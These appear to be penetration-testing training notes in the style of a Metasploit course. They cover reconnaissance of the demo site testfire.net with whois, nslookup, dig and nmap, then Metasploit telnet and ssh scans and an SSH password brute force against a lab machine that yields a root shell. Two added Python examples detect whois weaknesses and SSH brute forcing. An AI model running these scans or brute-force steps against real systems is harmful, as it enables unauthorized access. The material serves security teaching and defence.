Excerpted from: msf魔鬼训练营
0x00: whois
➜ ~ whois testfire.net
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: TESTFIRE.NET
Registrar: CSC CORPORATE DOMAINS, INC.
Sponsoring Registrar IANA ID: 299
Whois Server: whois.corporatedomains.com
Referral URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
Name Server: ASIA3.AKAM.NET
Name Server: EUR2.AKAM.NET
Name Server: EUR5.AKAM.NET
Name Server: NS1-206.AKAM.NET
Name Server: NS1-99.AKAM.NET
Name Server: USC2.AKAM.NET
Name Server: USC3.AKAM.NET
Name Server: USW2.AKAM.NET
Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Updated Date: 19-jul-2016
Creation Date: 23-jul-1999
Expiration Date: 23-jul-2017
...
Domain Name: testfire.net
Registry Domain ID: 8363973_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2016-07-19T05:24:30Z
Creation Date: 1999-07-23T13:52:32Z
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: domainabuse@cscglobal.com
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: IBM DNS Admin
Registrant Organization: International Business Machines Corporation
Registrant Street: New Orchard Road
Registrant City: Armonk
Registrant State/Province: NY
Registrant Postal Code: 10504
Registrant Country: US
Registrant Phone: +1.9147654227
Registrant Phone Ext:
Registrant Fax: +1.9147654370
Registrant Fax Ext:
Registrant Email: dnsadm@us.ibm.com
Registry Admin ID:
Admin Name: IBM DNS Admin
Admin Organization: IBM Corporation
Admin Street: New Orchard Road
Admin City: Armonk
Admin State/Province: NY
Admin Postal Code: 10504
Admin Country: US
Admin Phone: +1.9147654227
Admin Phone Ext:
Admin Fax: +1.9147654370
Admin Fax Ext:
Admin Email: dnsadm@us.ibm.com
Registry Tech ID:
Tech Name: IBM DNS Technical
Tech Organization: IBM Corporation
Tech Street: New Orchard Road
Tech City: Armonk
Tech State/Province: NY
Tech Postal Code: 10504
Tech Country: US
Tech Phone: +1.9147654227
Tech Phone Ext:
Tech Fax: +1.9147654370
Tech Fax Ext:
Tech Email: dnstech@us.ibm.com
Name Server: eur2.akam.net
Name Server: ns1-206.akam.net
Name Server: usc3.akam.net
Name Server: usc2.akam.net
Name Server: ns1-99.akam.net
Name Server: usw2.akam.net
Name Server: eur5.akam.net
Name Server: asia3.akam.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-07-19T05:24:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
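As an added example (not from the original notes), a small parser for the whois record above that runs the checks a domain owner wants on their own record: DNSSEC, registrar transfer lock, time to expiry and name-server redundancy. SAMPLE is a subset of the testfire.net record shown above; the thresholds and the `check` helper are assumptions.

```python
"""Added example (not from the original notes): parse a registrar whois
record and flag registration-hygiene findings. SAMPLE is a subset of the
testfire.net record shown above; the thresholds are assumptions."""
import re
from datetime import datetime

SAMPLE = """\
Domain Name: testfire.net
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Name Server: eur2.akam.net
Name Server: ns1-206.akam.net
DNSSEC: unsigned
"""
KEY_RE = re.compile(r"[A-Za-z][\w /-]*")  # drops banner sentences that contain ':'
ISO = "%Y-%m-%dT%H:%M:%SZ"

def parse_whois(text):
    """Collect 'Key: value' lines into {key: [values]}; repeated keys such as
    Name Server and Domain Status keep every value, blank values are dropped."""
    rec = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if sep and value and KEY_RE.fullmatch(key):
            rec.setdefault(key, []).append(value)
    return rec

def hygiene_findings(rec, now):
    """Checks a domain owner runs against their own record: DNSSEC enabled,
    registrar transfer lock present, time to expiry, name-server redundancy."""
    findings = []
    if any(v.lower() == "unsigned" for v in rec.get("DNSSEC", [])):
        findings.append("DNSSEC not enabled")
    statuses = rec.get("Domain Status", []) + rec.get("Status", [])  # thick and thin formats
    if not any(s.startswith("clientTransferProhibited") for s in statuses):
        findings.append("no registrar transfer lock")
    for exp in rec.get("Registrar Registration Expiration Date", []):
        days = (datetime.strptime(exp, ISO) - now).days
        if days < 60:
            findings.append(f"expires in {days} days")
    if len(rec.get("Name Server", [])) < 2:
        findings.append("fewer than two name servers")
    return findings

def check(text, now_iso):
    """Convenience wrapper: whois text plus an ISO timestamp -> findings."""
    return hygiene_findings(parse_whois(text), datetime.strptime(now_iso, ISO))
```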
0x01: nslookup
nslookup returns the non-authoritative answer, i.e. the IP address held in the DNS server's cache.
➜ ~ nslookup
> set type=A
> testfire.net
Server: 118.118.118.51
Address: 118.118.118.51#53
Non-authoritative answer:
Name: testfire.net
Address: 65.61.137.117
> exit
0x02: dig
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
{global-d-opt} host [@local-server] {local-d-opt}
[ host [@local-server] {local-d-opt} […]]
➜ ~ dig @ns.watson.ibm.com testfire.net
; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 1588
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net. IN A
;; Query time: 310 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Sun May 21 21:45:36 CST 2017
;; MSG SIZE rcvd: 41
0x03: searchdns.netcraft.com
Information lookup service: subdomains, operating system type, server addresses, domain addresses, geographic location.
0x04: IP2Location
Domestic: 纯真
Abroad: https://www.maxmind.com/zh/home
0x05: IP2Domain
Domestic: 7C
Abroad: http://www.ip-adress.com/reverse_ip
0x07: Port scanning and host discovery
MSF: scan with arp_sweep or other methods
Using Nmap
A legendary tool that needs no introduction
Official examples:
EXAMPLES:
nmap -v -A scanme.nmap.org // the all-purpose invocation; -A is slow
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
Using nmap to identify the operating system
➜ ~ sudo nmap -O 192.168.1.104
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-21 23:11 CST
Nmap scan report for bogon (192.168.1.104)
Host is up (0.026s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5357/tcp open wsdapi
6881/tcp open bittorrent-tracker
MAC Address: 00:25:D3:E0:17:23 (AzureWave Technology)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds
0x08: WEB-INFO collection
The methods above target domain, system, address and location information. From here on: web information collection.
–0x0800 dir: collecting website directory information
google hacking
use MSF auxiliary modules
–0x0801 Searching for special files
–0x0802 Specific pages
For more techniques see the Google Hacking technical manual
0x09 Network service scanning
–0x0900 telnet service
Because telnet transmits in the clear, it is very insecure and has mostly been replaced by ssh.
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run
[*] Scanned 028 of 256 hosts (010% complete)
[*] Scanned 078 of 256 hosts (030% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 171 of 256 hosts (066% complete)
[*] Scanned 197 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
–0x0901 SSH weak passwords
msf auxiliary(ssh_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run
[*] Scanned 052 of 256 hosts (020% complete)
[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 065 of 256 hosts (025% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 147 of 256 hosts (057% complete)
[*] Scanned 179 of 256 hosts (069% complete)
[*] 10.10.10.254:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 195 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 251 of 256 hosts (098% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.129 10.10.10.254
rhosts => 10.10.10.129 10.10.10.254
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/pass
pass_file => /root/pass
msf auxiliary(ssh_login) > run
[*] 10.10.10.254:22 SSH - Starting bruteforce
[*] 10.10.10.254:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[-] 10.10.10.254:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.254:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.129:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.129:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.254:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.254:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.129:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.129:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.254:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.254:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.129:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.129:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.254:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.254:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[-] 10.10.10.254:22 SSH - [5/5] - Failed: 'root':'ling'
[-] 10.10.10.129:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.129:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[*] Command shell session 1 opened (10.10.10.131:43480 -> 10.10.10.129:22) at 2017-05-21 21:45:18 -0400
[+] 10.10.10.129:22 SSH - [5/5] - Success: 'root':'ling' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
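As an added example (not from the original notes), the defender's view of the ssh_login run above: a detector over sshd log lines that flags a source reaching a burst of failed logins and, separately, a password login that then succeeds from that source. The log lines are constructed to mirror the run (failed root/ling attempts from one address, then a root success); the thresholds and the year are assumptions.

```python
"""Added example (not from the original notes): detect password guessing
like the ssh_login run above from sshd logs. SAMPLE_LOG is constructed to
mirror that run: failed root/ling logins from one source, then a success."""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
May 21 21:45:10 owaspbwa sshd[2201]: Failed password for root from 10.10.10.131 port 43470 ssh2
May 21 21:45:11 owaspbwa sshd[2203]: Failed password for invalid user ling from 10.10.10.131 port 43472 ssh2
May 21 21:45:13 owaspbwa sshd[2205]: Failed password for root from 10.10.10.131 port 43474 ssh2
May 21 21:45:15 owaspbwa sshd[2207]: Failed password for invalid user ling from 10.10.10.131 port 43476 ssh2
May 21 21:45:18 owaspbwa sshd[2209]: Accepted password for root from 10.10.10.131 port 43480 ssh2
May 21 21:50:02 owaspbwa sshd[2300]: Accepted publickey for admin from 10.10.10.5 port 50122 ssh2
"""
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+")

def parse_sshd(text, year=2017):
    """Return (timestamp, result, method, user, ip) tuples; syslog lines carry
    no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, max_failures=3, window_s=60):
    """Alert when a source reaches max_failures failed logins inside window_s,
    and again if a password login from that source then succeeds (the
    account is likely compromised). Thresholds are assumptions."""
    recent, alerts = defaultdict(list), []
    for ts, result, method, user, ip in sorted(events):
        fails = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
        if result == "Failed":
            fails.append(ts)
            if len(fails) == max_failures:
                alerts.append(("bruteforce", ip))
        elif method == "password" and len(fails) >= max_failures:
            alerts.append(("success-after-bruteforce", ip, user))
        recent[ip] = fails
    return alerts
```

The key-based login from 10.10.10.5 is not flagged, so the rule does not fire on ordinary administrator activity.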
0x0A Using vulnerability scanners
OpenVAS